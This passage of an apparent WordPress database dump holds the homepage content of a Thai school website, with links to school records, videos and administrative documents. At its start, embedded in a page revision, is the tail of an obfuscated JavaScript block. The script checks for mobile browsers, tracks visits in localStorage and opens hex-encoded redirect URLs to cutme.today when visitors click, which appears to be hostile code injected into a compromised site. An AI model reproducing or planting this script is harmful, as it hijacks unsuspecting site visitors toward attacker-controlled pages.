|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:47:29','2024-08-30 02:47:29','',19,'http://watprato.ssk.in.th/?p=284',0,'revision','',0),
(286,2,'2024-08-30 09:49:00','2024-08-30 02:49:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a 